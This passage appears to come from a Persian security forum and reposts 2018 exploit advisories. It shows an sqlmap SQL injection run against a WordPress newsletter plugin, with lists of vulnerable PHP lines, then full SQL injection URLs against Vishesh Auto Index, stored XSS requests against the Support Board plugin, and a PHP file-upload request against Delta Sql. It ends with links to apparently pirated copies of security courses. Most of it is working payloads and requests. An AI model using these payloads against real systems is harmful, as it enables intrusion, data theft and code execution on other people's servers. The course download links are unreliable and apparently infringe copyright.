empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  19. # Exploit Title: Vishesh Auto Index 3.1 - 'fid' SQL Injection # Dork: N/A # Date: 2018-10-15 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.vishesh.cf/ # Software Link: https://sourceforge.net/projects/vishesh-wap-auto-index/files/latest/download # Version: 3.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://192.168.1.27/[PATH]/file.php?fid=[SQL] -1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe GET /[PATH]/file.php?fid=-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:12:23 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7799 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://192.168.1.27/[PATH]/download.php?fid[SQL] -1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe GET /[PATH]/download.php?fid=-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:18:41 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 835 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  20. # Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting # Date: 2018-10-16 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://schiocco.com/ # Software Link : https://board.support/ # Software : Support Board - Chat And Help Desk # Version : v1.2.3 # Vulernability Type : Code Injection # Vulenrability : HTML Injection and Stored XSS # CVE : N/A # In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, # a Stored XSS vulnerability has been discovered in file upload areas in the # Chat and Help Desk sections via the msg parameter # in a /wp-admin/admin-ajax.php sb_ajax_add_message action. # HTTP POST Request : [Stored XSS] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/chat/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 450 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang= # In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin, # the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and # file upload areas in the Chat and Help Desk sections of Schiocco. # HTTP POST Request : [HTML Injection] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/desk-demo/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 288 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
  21. # Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=1 # # http://localhost/[PATH]/upload/[FILE] POST /[PATH]/docs_upload.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/[PATH]/docs_manage.php?id=1 Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive Content-Type: multipart/form-data; boundary= ---------------------------158943328914318561992147220435 Content-Length: 721 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php" Content-Type: application/force-download <?php phpinfo(); ?> -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="submit" Upload File -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="id" 1 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="version" -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="hasdocs" -----------------------------158943328914318561992147220435-- HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:24:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1783 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <html> <body> <form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data"> Select document to upload: <input name="fileToUpload" id="fileToUpload" type="file"> <input value="Ver Ayari" name="submit" type="submit"> <input value="1" name="id" type="hidden"> <input value="1'" name="version" type="hidden"> <input value="1" name="hasdocs" type="hidden"> </form> </body> </html>
  22. دوره آموزشی 100 تارگت آموزنده از فرانش (بخش 4) مدرس : بهروز منصوری سازنده : https://faranesh.com/network-security/16520-100-target-informative-4 دانلود رایگان : https://tg-go.noyes.in/i/BQADAQADMQAD5jboRrR8kVIUwMjdAg/8e69f20cfb87e7ca7d54c46c6d364db9/1540536999 Pass: @‌Mr_package
  23. دوره آموزشی بررسی علل پیدایش حفره امنیتی CSRF سازنده : https://faranesh.com/network-security/15939-bug-and-csrf-attacks مدرس : بهروز منصوری دانلود رایگان: https://tg-go.noyes.in/i/BQADAQADDwAD5jbwRku4dVEHNDkGAg/f19874861f6677daee077a2ea06ff367/1540536765 Pass: @‌Mr_package
  24. دوره آموزشی چگونه نفوذ به سایت را تشخیص دهیم از فرانش سازنده :https://faranesh.com/network-security/15881-intrusion-detection قیمت : 30 تومن دانلود رایگان : https://tg-go.noyes.in/i/BQADAQADMgAD5jboRs2A9DcwxqPmAg/87f3637205d10a8e7459f7a518c9ebb6/1540536652 Pass: @‌Mr_package
×
×
  • جدید...